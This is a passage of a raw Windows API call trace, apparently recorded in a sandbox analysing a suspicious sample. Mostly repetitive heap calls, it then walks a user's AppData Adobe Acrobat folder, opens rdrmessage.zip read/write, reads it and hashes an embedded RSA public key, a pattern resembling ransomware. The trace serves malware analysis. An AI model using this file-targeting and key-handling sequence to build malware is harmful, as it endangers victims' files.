(HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0240.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0240.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0240.969] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0240.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0240.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c44b0 | out: hHeap=0x620000) returned 1 [0240.969] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0240.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0240.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0240.969] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0240.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fa48 [0240.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0240.969] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0240.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0240.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fa48 | out: hHeap=0x620000) returned 1 [0240.969] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0240.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.969] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0240.969] PathFindFileNameW (pszPath="") returned="" [0240.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.969] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0241.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0241.366] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.366] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd9b6a040, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9b6a040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xde963ca0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0xa5ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rdrmessage.zip", cAlternateFileName="RDRMES~1.ZIP")) returned 1 [0241.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0241.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0241.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0241.366] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned=".zip" [0241.366] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0241.368] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=42495) returned 1 [0241.368] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0241.370] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xa5d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.371] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0241.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0241.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0241.373] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0241.373] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xa5ff, lpOverlapped=0x0) returned 1 [0241.374] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0241.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0241.374] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0241.374] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0241.374] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0241.375] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0241.375] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0241.375] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0241.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0241.375] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0241.375] GetLastError () returned 0x0 [0241.375] CryptDestroyHash (hHash=0x33f0408) returned 1 [0241.375] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0241.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: 